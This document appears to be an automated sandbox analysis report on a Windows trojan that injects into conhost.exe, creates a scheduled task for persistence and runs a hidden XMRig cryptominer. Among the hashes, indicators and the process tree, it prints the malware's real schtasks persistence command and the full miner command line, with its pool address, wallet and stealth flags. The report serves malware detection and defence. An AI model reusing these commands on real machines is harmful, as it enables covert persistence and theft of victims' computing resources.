Analysis
- max time kernel: 150s
- max time network: 195s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 14-10-2021 08:52
- Static task: static1
- Behavioral task: behavioral1
- Sample: SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe
- Resource: win7v20210408
General
- Target: SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe
- Size: 5.3MB
- MD5: f8d8071d3e0163eb4e816ec49d0b2e8e
- SHA1: a71da7648e0ee019d1594b583df94f4c6b7fae6c
- SHA256: 40387bebfe97eea9c90425caf5519019dfc0e7425bb238246ec9f7bb5d621293
- SHA512: 23dd39d2d4906779a44db6aa112c0a7317004664753facfe19233bb742f84ae8c039c0dbe26d85f16a46dd2cd1e97cc1b594dfa23f7cf3deb0dac5eeed10dabf
Malware Config
Signatures

- XMRig Miner Payload (12 IoCs)
  Processes (resource | yara_rule):
  - behavioral1/memory/1372-85-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
  - behavioral1/memory/1372-87-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
  - behavioral1/memory/1372-92-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
  - behavioral1/memory/1372-89-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
  - behavioral1/memory/1372-93-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
  - behavioral1/memory/1372-94-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
  - behavioral1/memory/1372-95-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
  - behavioral1/memory/1372-96-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
  - behavioral1/memory/1372-97-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
  - behavioral1/memory/1372-98-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
  - behavioral1/memory/1372-99-0x000000014030F3F8-mapping.dmp | xmrig
  - behavioral1/memory/1372-101-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig

- Executes dropped EXE (2 IoCs)
  Processes (pid | process):
  - 2024 | services64.exe
  - 1964 | sihost64.exe

- Loads dropped DLL (3 IoCs)
  Processes (pid | process):
  - 1640 | cmd.exe
  - 1744 | conhost.exe
  - 1744 | conhost.exe

- Suspicious use of SetThreadContext (1 IoCs)
  Processes (description | pid | process | target process):
  - PID 1744 set thread context of 1372 | 1744 | conhost.exe | conhost.exe

- Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.

- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes (pid | process):
  - 844 | conhost.exe
  - 1744 | conhost.exe
  - 1744 | conhost.exe
  - 1372 | conhost.exe
  - 1372 | conhost.exe

- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes (description | pid | process):
  - Token: SeDebugPrivilege | 844 | conhost.exe
  - Token: SeDebugPrivilege | 1744 | conhost.exe
  - Token: SeLockMemoryPrivilege | 1372 | conhost.exe
  - Token: SeLockMemoryPrivilege | 1372 | conhost.exe

- Suspicious use of WriteProcessMemory (39 IoCs)
  Processes (description | pid | process | target process):
  - PID 1984 wrote to memory of 844 | 1984 | SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe | conhost.exe
  - PID 1984 wrote to memory of 844 | 1984 | SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe | conhost.exe
  - PID 1984 wrote to memory of 844 | 1984 | SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe | conhost.exe
  - PID 1984 wrote to memory of 844 | 1984 | SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe | conhost.exe
  - PID 844 wrote to memory of 1260 | 844 | conhost.exe | cmd.exe
  - PID 844 wrote to memory of 1260 | 844 | conhost.exe | cmd.exe
  - PID 844 wrote to memory of 1260 | 844 | conhost.exe | cmd.exe
  - PID 1260 wrote to memory of 1020 | 1260 | cmd.exe | schtasks.exe
  - PID 1260 wrote to memory of 1020 | 1260 | cmd.exe | schtasks.exe
  - PID 1260 wrote to memory of 1020 | 1260 | cmd.exe | schtasks.exe
  - PID 844 wrote to memory of 1640 | 844 | conhost.exe | cmd.exe
  - PID 844 wrote to memory of 1640 | 844 | conhost.exe | cmd.exe
  - PID 844 wrote to memory of 1640 | 844 | conhost.exe | cmd.exe
  - PID 1640 wrote to memory of 2024 | 1640 | cmd.exe | services64.exe
  - PID 1640 wrote to memory of 2024 | 1640 | cmd.exe | services64.exe
  - PID 1640 wrote to memory of 2024 | 1640 | cmd.exe | services64.exe
  - PID 2024 wrote to memory of 1744 | 2024 | services64.exe | conhost.exe
  - PID 2024 wrote to memory of 1744 | 2024 | services64.exe | conhost.exe
  - PID 2024 wrote to memory of 1744 | 2024 | services64.exe | conhost.exe
  - PID 2024 wrote to memory of 1744 | 2024 | services64.exe | conhost.exe
  - PID 1744 wrote to memory of 1964 | 1744 | conhost.exe | sihost64.exe
  - PID 1744 wrote to memory of 1964 | 1744 | conhost.exe | sihost64.exe
  - PID 1744 wrote to memory of 1964 | 1744 | conhost.exe | sihost64.exe
  - PID 1744 wrote to memory of 1372 | 1744 | conhost.exe | conhost.exe
  - PID 1744 wrote to memory of 1372 | 1744 | conhost.exe | conhost.exe
  - PID 1744 wrote to memory of 1372 | 1744 | conhost.exe | conhost.exe
  - PID 1744 wrote to memory of 1372 | 1744 | conhost.exe | conhost.exe
  - PID 1744 wrote to memory of 1372 | 1744 | conhost.exe | conhost.exe
  - PID 1744 wrote to memory of 1372 | 1744 | conhost.exe | conhost.exe
  - PID 1744 wrote to memory of 1372 | 1744 | conhost.exe | conhost.exe
  - PID 1744 wrote to memory of 1372 | 1744 | conhost.exe | conhost.exe
  - PID 1744 wrote to memory of 1372 | 1744 | conhost.exe | conhost.exe
  - PID 1744 wrote to memory of 1372 | 1744 | conhost.exe | conhost.exe
  - PID 1744 wrote to memory of 1372 | 1744 | conhost.exe | conhost.exe
  - PID 1744 wrote to memory of 1372 | 1744 | conhost.exe | conhost.exe
  - PID 1744 wrote to memory of 1372 | 1744 | conhost.exe | conhost.exe
  - PID 1744 wrote to memory of 1372 | 1744 | conhost.exe | conhost.exe
  - PID 1744 wrote to memory of 1372 | 1744 | conhost.exe | conhost.exe
  - PID 1744 wrote to memory of 1372 | 1744 | conhost.exe | conhost.exe
Processes (nesting level shown in brackets; each entry gives image path, then command line, then triggered signatures)

- [1] C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe"
  - Suspicious use of WriteProcessMemory

  - [2] C:\Windows\System32\conhost.exe
    command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    - [3] C:\Windows\System32\cmd.exe
      command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
      - Suspicious use of WriteProcessMemory

      - [4] C:\Windows\system32\schtasks.exe
        command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        - Creates scheduled task(s)

    - [3] C:\Windows\System32\cmd.exe
      command line: "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

      - [4] C:\Users\Admin\AppData\Local\Temp\services64.exe
        command line: C:\Users\Admin\AppData\Local\Temp\services64.exe
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory

        - [5] C:\Windows\System32\conhost.exe
          command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
          - Loads dropped DLL
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

          - [6] C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
            command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
            - Executes dropped EXE

          - [6] C:\Windows\System32\conhost.exe
            command line: C:\Windows/System32\conhost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=45JpPqakEn7EwqkL6WB28DLDt58UcCNARMdsAGo6VGdfUByVDFtFCxrNBD7UhWSNvGQCjvLgahxNrMc3T7szAVfj2JW7Kyq --pass=666 --cpu-max-threads-hint=90 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-kill-targets="" --cinit-idle-wait=5 --cinit-idle-cpu=50 --cinit-stealth --cinit-kill
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

- C:\Users\Admin\AppData\Local\Temp\services64.exe
  MD5: f8d8071d3e0163eb4e816ec49d0b2e8e
  SHA1: a71da7648e0ee019d1594b583df94f4c6b7fae6c
  SHA256: 40387bebfe97eea9c90425caf5519019dfc0e7425bb238246ec9f7bb5d621293
  SHA512: 23dd39d2d4906779a44db6aa112c0a7317004664753facfe19233bb742f84ae8c039c0dbe26d85f16a46dd2cd1e97cc1b594dfa23f7cf3deb0dac5eeed10dabf

- C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
  MD5: 1f88c4258f73d6b14dcb92dd6cc68d11
  SHA1: fdcfdee8671895974de7a615886f2c2fa926289d
  SHA256: 99e6f9f570f7d401de9fd417595adeabe4a0a5d4a9093e51c99437596e1fb2d1
  SHA512: a235d17555a352492f7ffc8308c1a8ff89da0475bd6ef0dc8799f59887986056eae0a1a720c2b2f5d5a418e0eba9d31027fd10d60f4f598eae08a4e5e7459f77

- \Users\Admin\AppData\Local\Temp\services64.exe
  MD5: f8d8071d3e0163eb4e816ec49d0b2e8e
  SHA1: a71da7648e0ee019d1594b583df94f4c6b7fae6c
  SHA256: 40387bebfe97eea9c90425caf5519019dfc0e7425bb238246ec9f7bb5d621293
  SHA512: 23dd39d2d4906779a44db6aa112c0a7317004664753facfe19233bb742f84ae8c039c0dbe26d85f16a46dd2cd1e97cc1b594dfa23f7cf3deb0dac5eeed10dabf

- \Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
  MD5: 1f88c4258f73d6b14dcb92dd6cc68d11
  SHA1: fdcfdee8671895974de7a615886f2c2fa926289d
  SHA256: 99e6f9f570f7d401de9fd417595adeabe4a0a5d4a9093e51c99437596e1fb2d1
  SHA512: a235d17555a352492f7ffc8308c1a8ff89da0475bd6ef0dc8799f59887986056eae0a1a720c2b2f5d5a418e0eba9d31027fd10d60f4f598eae08a4e5e7459f77
Memory dumps (file | size; mapping dumps have no size)

- memory/844-67-0x000000001B0F4000-0x000000001B0F6000-memory.dmp | 8KB
- memory/844-66-0x000000001B0F2000-0x000000001B0F4000-memory.dmp | 8KB
- memory/844-68-0x000000001B0F6000-0x000000001B0F7000-memory.dmp | 4KB
- memory/844-69-0x000000001B0F7000-0x000000001B0F8000-memory.dmp | 4KB
- memory/844-62-0x000000001B390000-0x000000001B5AC000-memory.dmp | 2.1MB
- memory/844-61-0x00000000001C0000-0x00000000003E0000-memory.dmp | 2.1MB
- memory/1020-65-0x0000000000000000-mapping.dmp
- memory/1260-64-0x0000000000000000-mapping.dmp
- memory/1372-89-0x0000000140000000-0x0000000140786000-memory.dmp | 7.5MB
- memory/1372-96-0x0000000140000000-0x0000000140786000-memory.dmp | 7.5MB
- memory/1372-102-0x0000000000440000-0x0000000000460000-memory.dmp | 128KB
- memory/1372-101-0x0000000140000000-0x0000000140786000-memory.dmp | 7.5MB
- memory/1372-100-0x0000000000120000-0x0000000000140000-memory.dmp | 128KB
- memory/1372-82-0x0000000140000000-0x0000000140786000-memory.dmp | 7.5MB
- memory/1372-83-0x0000000140000000-0x0000000140786000-memory.dmp | 7.5MB
- memory/1372-84-0x0000000140000000-0x0000000140786000-memory.dmp | 7.5MB
- memory/1372-85-0x0000000140000000-0x0000000140786000-memory.dmp | 7.5MB
- memory/1372-87-0x0000000140000000-0x0000000140786000-memory.dmp | 7.5MB
- memory/1372-99-0x000000014030F3F8-mapping.dmp
- memory/1372-98-0x0000000140000000-0x0000000140786000-memory.dmp | 7.5MB
- memory/1372-92-0x0000000140000000-0x0000000140786000-memory.dmp | 7.5MB
- memory/1372-97-0x0000000140000000-0x0000000140786000-memory.dmp | 7.5MB
- memory/1372-95-0x0000000140000000-0x0000000140786000-memory.dmp | 7.5MB
- memory/1372-94-0x0000000140000000-0x0000000140786000-memory.dmp | 7.5MB
- memory/1372-93-0x0000000140000000-0x0000000140786000-memory.dmp | 7.5MB
- memory/1640-70-0x0000000000000000-mapping.dmp
- memory/1744-86-0x000000001B092000-0x000000001B094000-memory.dmp | 8KB
- memory/1744-91-0x000000001B097000-0x000000001B098000-memory.dmp | 4KB
- memory/1744-90-0x000000001B096000-0x000000001B097000-memory.dmp | 4KB
- memory/1744-88-0x000000001B094000-0x000000001B096000-memory.dmp | 8KB
- memory/1964-80-0x0000000000000000-mapping.dmp
- memory/1984-59-0x0000000000400000-0x0000000000CD3000-memory.dmp | 8.8MB
- memory/2024-74-0x0000000000400000-0x0000000000CD3000-memory.dmp | 8.8MB
- memory/2024-72-0x0000000000000000-mapping.dmp